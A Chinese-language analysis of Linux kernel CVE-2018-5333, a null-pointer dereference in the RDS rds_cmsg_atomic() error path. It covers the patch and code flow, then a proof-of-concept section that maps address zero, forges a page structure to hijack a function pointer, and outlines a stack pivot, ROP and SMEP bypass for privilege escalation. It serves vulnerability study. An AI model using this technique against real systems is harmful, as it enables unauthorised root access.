影响版本:Linux 4.14.14 以前(CVSS 评分 5.5)。4.14.13 未修补,4.14.14 已修补。
测试版本:Linux-4.14.13 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory
编译选项:CONFIG_RDS=y CONFIG_DEBUG_INFO=y CONFIG_SLAB=y
General setup
—> Choose SLAB allocator (SLUB (Unqueued Allocator))
—> SLAB
在编译时将.config
中的CONFIG_E1000
和CONFIG_E1000E
,变更为=y。参考
可以利用 CVE-2019-9213漏洞 将 MMAP_MIN_ADDR
设置为0,也可以直接在编译时配置内核CONFIG_DEFAULT_MMAP_MIN_ADDR=0
。
$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.14.13.tar.xz
$ tar -xvf linux-4.14.13.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录:/arch/x86/boot/bzImage。
漏洞描述:net/rds/rdma.c
中的 rds_cmsg_atomic()
函数在出错返回时忘记将rm->atomic.op_active
置0,导致 rds_atomic_free_op() -> set_page_dirty() 使用由 scatterlist 的 page_link(初始值为0)取得的空 page 指针
时发生 null-dereference
漏洞。
补丁:patch
diff --git a/net/rds/rdma.c b/net/rds/rdma.c
index 94729d9da4372..634cfcb7bba68 100644
--- a/net/rds/rdma.c
+++ b/net/rds/rdma.c
@@ -877,6 +877,7 @@ int rds_cmsg_atomic(struct rds_sock *rs, struct rds_message *rm,
err:
if (page)
put_page(page);
+ rm->atomic.op_active = 0;
kfree(rm->atomic.op_notifier);
return ret;
保护机制:开启SMEP,关闭KASLR/SMAP。
利用总结:利用空指针引用漏洞,在0地址伪造结构和函数指针,劫持控制流。
一、漏洞分析
RDS介绍:具体可查看Documentation/networking/rds.txt
,
漏洞触发流程:SyS_sendmsg
-> __sys_sendmsg
-> ___sys_sendmsg
-> sock_sendmsg
-> selinux_socket_sendmsg
sendmsg() -> rds_sendmsg() -> rds_cmsg_send() -> rds_cmsg_atomic()
崩溃流程:rds_sendmsg() (从rds_cmsg_send()
返回) -> rds_message_put() -> rds_message_purge() -> rds_atomic_free_op() -> set_page_dirty()
将socket的协议族设置为PF_RDS
,即可通过sendmsg
调用来触发rds_cmsg_send() 。
sendmsg
调用参数:
sendmsg(int socket, const struct msghdr *message, int flags);
// msghdr structure (the message descriptor passed to sendmsg)
struct msghdr {
void *msg_name; /* ptr to socket address structure */
int msg_namelen; /* size of socket address structure */
struct iov_iter msg_iter; /* data */
void *msg_control; /* ancillary data */ // used to pass protocol-specific data; points to a struct cmsghdr whose length is msg_controllen
__kernel_size_t msg_controllen; /* ancillary data buffer length */
unsigned int msg_flags; /* flags on received message */
struct kiocb *msg_iocb; /* ptr to iocb for async requests */
};
// cmsghdr structure; it carries an implicit trailing field, unsigned char cmsg_data[], that holds the payload for the specific protocol to consume.
struct cmsghdr {
__kernel_size_t cmsg_len; /* data byte count, including hdr */
int cmsg_level; /* originating protocol */
int cmsg_type; /* protocol-specific type */
};
调用流程分析:
/*
 * rds_sendmsg() -- excerpt; "... ..." marks code elided from the quote.
 * A non-zero return from rds_cmsg_send() jumps to the out label, where
 * rds_message_put(rm) is called if rm is non-NULL.
 */
int rds_sendmsg(struct socket *sock, struct msghdr *msg, size_t payload_len)
{
... ...
ret = rds_cmsg_send(rs, rm, msg, &allocated_mr); // <-------------- any non-zero return takes the error path below
if (ret) {
/* Trigger connection so that its ready for the next retry */
if (ret == -EAGAIN)
rds_conn_connect_if_down(conn);
goto out;
}
... ...
out:
/* If the user included a RDMA_MAP cmsg, we allocated a MR on the fly.
* If the sendmsg goes through, we keep the MR. If it fails with EAGAIN
* or in any other way, we need to destroy the MR again */
if (allocated_mr)
rds_rdma_unuse(rs, rds_rdma_cookie_key(rm->m_rdma_cookie), 1);
if (rm)
rds_message_put(rm); // <--------------- the message is released here on the error path
return ret;
}
// (1) rds_cmsg_send() -- excerpt; parts of the body are elided ("... ...") and the quote is cut short
// Walks every control message in msg; the four atomic cmsg types below are all handed to rds_cmsg_atomic().
static int rds_cmsg_send(struct rds_sock *rs, struct rds_message *rm,
struct msghdr *msg, int *allocated_mr)
{
struct cmsghdr *cmsg;
int ret = 0;
for_each_cmsghdr(cmsg, msg) {
... ...
case RDS_CMSG_ATOMIC_CSWP:
case RDS_CMSG_ATOMIC_FADD:
case RDS_CMSG_MASKED_ATOMIC_CSWP:
case RDS_CMSG_MASKED_ATOMIC_FADD:
ret = rds_cmsg_atomic(rs, rm, cmsg); // <----------------
break;
... ...
}
// (2) rds_cmsg_atomic -- fills in the rds_message for an atomic-type request
// NOTE: this is the vulnerable (unpatched) version quoted on purpose: the err path does not reset rm->atomic.op_active.
int rds_cmsg_atomic(struct rds_sock *rs, struct rds_message *rm,
struct cmsghdr *cmsg)
{
struct page *page = NULL;
struct rds_atomic_args *args;
int ret = 0;
if (cmsg->cmsg_len < CMSG_LEN(sizeof(struct rds_atomic_args))
|| rm->atomic.op_active)
return -EINVAL;
args = CMSG_DATA(cmsg); // #define CMSG_DATA(cmsg) ((void *)((char *)(cmsg) + sizeof(struct cmsghdr))) args points at cmsg_data inside cmsg, i.e. the user-supplied memory
... ...
rm->atomic.op_notify = !!(args->flags & RDS_RDMA_NOTIFY_ME);
rm->atomic.op_silent = !!(args->flags & RDS_RDMA_SILENT);
rm->atomic.op_active = 1; // [1] marks the op as initialized / usable
rm->atomic.op_recverr = rs->rs_recverr;
rm->atomic.op_sg = rds_message_alloc_sgs(rm, 1); // [2] takes a scatterlist from the ones trailing the rds_message; these scatterlists are still in their initial state and no real page has been assigned yet
if (!rm->atomic.op_sg) {
ret = -ENOMEM;
goto err;
}
/* verify 8 byte-aligned */
if (args->local_addr & 0x7) { // [3] address alignment check
ret = -EFAULT;
goto err;
}
ret = rds_pin_pages(args->local_addr, 1, &page, 1); // [4] pins the user page; the scatterlist is then set to this page
if (ret != 1)
goto err;
ret = 0;
sg_set_page(rm->atomic.op_sg, page, 8, offset_in_page(args->local_addr));
if (rm->atomic.op_notify || rm->atomic.op_recverr) {
/* We allocate an uninitialized notifier here, because
* we don't want to do that in the completion handler. We
* would have to use GFP_ATOMIC there, and don't want to deal
* with failed allocations.
*/
rm->atomic.op_notifier = kmalloc(sizeof(*rm->atomic.op_notifier), GFP_KERNEL);
if (!rm->atomic.op_notifier) {
ret = -ENOMEM;
goto err;
}
rm->atomic.op_notifier->n_user_token = args->user_token;
rm->atomic.op_notifier->n_status = RDS_RDMA_SUCCESS;
}
rm->atomic.op_rkey = rds_rdma_cookie_key(args->cookie);
rm->atomic.op_remote_addr = args->remote_addr + rds_rdma_cookie_offset(args->cookie);
return ret;
err:
if (page)
put_page(page);
kfree(rm->atomic.op_notifier); // [5] on error rm->atomic.op_notifier is freed and rds_sendmsg as a whole ends; the rds_message structure is released afterwards (op_active is still 1 at this point)
return ret;
}
// (3) rds_message_put()
// Drops one reference on rm; when refcount_dec_and_test() reports true, the message is purged via rds_message_purge() and then freed with kfree().
void rds_message_put(struct rds_message *rm)
{
rdsdebug("put rm %p ref %d\n", rm, refcount_read(&rm->m_refcount));
WARN(!refcount_read(&rm->m_refcount), "danger refcount zero on %p\n", rm);
if (refcount_dec_and_test(&rm->m_refcount)) {
BUG_ON(!list_empty(&rm->m_sock_item));
BUG_ON(!list_empty(&rm->m_conn_item));
rds_message_purge(rm); // <--------------- continues into the purge path
kfree(rm);
}
}
EXPORT_SYMBOL_GPL(rds_message_put);
// (4) rds_message_purge() -- if either of the two earlier error paths was taken, rm->atomic.op_active was not reset to 0 on return, so execution enters rds_atomic_free_op() here
// Excerpt; "..." marks code elided from the quote.
static void rds_message_purge(struct rds_message *rm)
{
unsigned long i, flags;
bool zcopy = false;
...
if (rm->rdma.op_active)
rds_rdma_free_op(&rm->rdma);
if (rm->rdma.op_rdma_mr)
rds_mr_put(rm->rdma.op_rdma_mr);
if (rm->atomic.op_active)
rds_atomic_free_op(&rm->atomic); // <--------------- reached whenever op_active is still non-zero
if (rm->atomic.op_rdma_mr)
rds_mr_put(rm->atomic.op_rdma_mr);
}
// (5) rds_atomic_free_op()
// Fetches the page from ao->op_sg via sg_page(), marks it dirty, drops it, frees the notifier and clears op_active.
// The page pointer is used without any NULL check.
void rds_atomic_free_op(struct rm_atomic_op *ao)
{
struct page *page = sg_page(ao->op_sg); // <---------------- page is derived from the scatterlist's page_link
/* Mark page dirty if it was possibly modified, which
* is the case for a RDMA_READ which copies from remote
* to local memory */
set_page_dirty(page);
put_page(page);
kfree(ao->op_notifier);
ao->op_notifier = NULL;
ao->op_active = 0;
}
// (6) sg_page() -- the vulnerability trigger point: the page of the corresponding scatterlist was never set before the error occurred. Bits 0 and 1 of scatterlist.page_link are the sg_chain and sg_end flags, so the result is 4-byte aligned. In the initial state page_link equals 0, so the later operations on the page structure become a NULL pointer dereference. The fix is therefore simple: set rm->atomic.op_active=0 on the error return above, which keeps rds_atomic_free_op() from being executed.
static inline struct page *sg_page(struct scatterlist *sg)
{
return (struct page *)((sg)->page_link & ~(SG_CHAIN | SG_END));
}
(2) -> [2] scatterlist
结构的创建:
// rds_message_alloc() -- when the rds_message is allocated, room is reserved for the scatterlist entries (a scatter/gather table of physical memory, mainly for DMA use)
// Excerpt; "..." marks code elided from the quote.
struct rds_message *rds_message_alloc(unsigned int extra_len, gfp_t gfp)
{
struct rds_message *rm;
if (extra_len > KMALLOC_MAX_SIZE - sizeof(struct rds_message))
return NULL;
rm = kzalloc(sizeof(struct rds_message) + extra_len, gfp); // extra_len is the size of the scatterlists; kzalloc zero-fills, so their page_link starts out as 0
if (!rm)
goto out;
rm->m_used_sgs = 0;
rm->m_total_sgs = extra_len / sizeof(struct scatterlist);
...
out:
return rm;
}
// rds_rm_size() -- shows how extra_len is computed (excerpt; "..." marks elided code and the quote is cut short)
static int rds_rm_size(struct msghdr *msg, int num_sgs,
struct rds_iov_vector_arr *vct)
{
...
switch (cmsg->cmsg_type) {
case RDS_CMSG_ATOMIC_CSWP:
case RDS_CMSG_ATOMIC_FADD:
case RDS_CMSG_MASKED_ATOMIC_CSWP:
case RDS_CMSG_MASKED_ATOMIC_FADD:
cmsg_groups |= 1;
// each atomic cmsg adds room for one scatterlist entry
size += sizeof(struct scatterlist);
break;
...
size += num_sgs * sizeof(struct scatterlist);
二、漏洞利用
思路:伪造page结构,劫持page结构上的函数指针。
函数指针引用流程:rds_sendmsg() (从rds_cmsg_send()
返回) -> rds_message_put() -> rds_message_purge() -> rds_atomic_free_op() -> set_page_dirty() -> page_mapping()
// (4) rds_atomic_free_op()
// The page obtained from sg_page(ao->op_sg) is passed straight to set_page_dirty(); no NULL check is made.
void rds_atomic_free_op(struct rm_atomic_op *ao)
{
struct page *page = sg_page(ao->op_sg);
/* Mark page dirty if it was possibly modified, which
* is the case for a RDMA_READ which copies from remote
* to local memory */
set_page_dirty(page);
put_page(page);
kfree(ao->op_notifier);
ao->op_notifier = NULL;
ao->op_active = 0;
}
// (5) set_page_dirty() -- excerpt; "... ..." marks code elided from the quote
int set_page_dirty(struct page *page)
{
struct address_space *mapping = page_mapping(page); // <-------------- mapping is derived from page
page = compound_head(page);
if (likely(mapping)) {
int (*spd)(struct page *) = mapping->a_ops->set_page_dirty; // a function pointer is fetched here; since mapping comes from page, control flow can be hijacked. Trick: make full use of address 0 -- a_ops can be set to 0, but mapping must not be 0; details below.
... ...
return (*spd)(page);
}
if (!PageDirty(page)) {
if (!TestSetPageDirty(page))
return 1;
}
return 0;
}
EXPORT_SYMBOL(set_page_dirty);
// (6) page_mapping() -- how mapping is extracted from page
struct address_space *page_mapping(struct page *page)
{
struct address_space *mapping;
page = compound_head(page); // [1] page->compound_head can be used to change which page is pointed to; may be useful.
/* This happens if someone calls flush_dcache_page on slab page */
if (unlikely(PageSlab(page)))
return NULL;
if (unlikely(PageSwapCache(page))) { // [2] avoid entering this branch; the check compares bits of page->flags, so zeroing page->flags is enough.
swp_entry_t entry;
entry.val = page_private(page);
return swap_address_space(entry);
}
mapping = page->mapping;
if ((unsigned long)mapping & PAGE_MAPPING_ANON) // [3] NULL is returned if the ANON bit is set; otherwise mapping is returned with its flag bits masked off
return NULL;
return (void *)((unsigned long)mapping & ~PAGE_MAPPING_FLAGS);
}
EXPORT_SYMBOL(page_mapping);
// compound_head()
// If bit 0 of page->compound_head is set, returns (head - 1) as the page pointer; otherwise returns page unchanged.
static inline struct page *compound_head(struct page *page)
{
unsigned long head = READ_ONCE(page->compound_head);
if (unlikely(head & 1))
return (struct page *) (head - 1);
return page;
}
伪造page结构:目标是劫持(5)
中的int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;
这一函数指针。可充分利用0地址,将 a_ops
设置为0,mapping
不能设置为0。当 page
和a_ops
都设置为0时,需要解决一个冲突(两者在偏移0x18处重叠):
page->mapping == ((char *)page)+0x18
a_ops->set_page_dirty == ((char *)a_ops)+0x18
// so it is best to go through compound_head(head) to change page, pointing page at some other user-space memory, e.g. the stack
char str[1000];
map_null_address();
unsigned long *data = (unsigned long *)0;
memset(str,0,1000);
// fake page->mapping (offset 0x18 inside str) points back at str; everything else in str stays zero
*((unsigned long *)(str+0x18)) = str;
// NOTE(review): presumably the compound_head slot of the fake page at address 0, with bit 0 set so compound_head() yields str -- the field offset is not shown here, confirm against the target kernel's struct page
data[1] = str+1;
// offset 0x18 from address 0: the set_page_dirty slot when a_ops is 0
data[3] = 0xffffffffdeadbeaf;
trigger_null_pointer_ref();
// the fault below shows that it worked
[ 2515.888056] BUG: unable to handle kernel paging request at ffffffffdeadbeaf
利用:利用xchg
指令做栈迁移(stack pivot),将栈切换到用户空间内存上执行ROP;也可以写CR4绕过SMEP。
参考
https://nvd.nist.gov/vuln/detail/CVE-2018-5333
CVE-2019-9213 && CVE-2018-5333组合提权
泄露地址 CVE-2017-16994 —— patch blog exp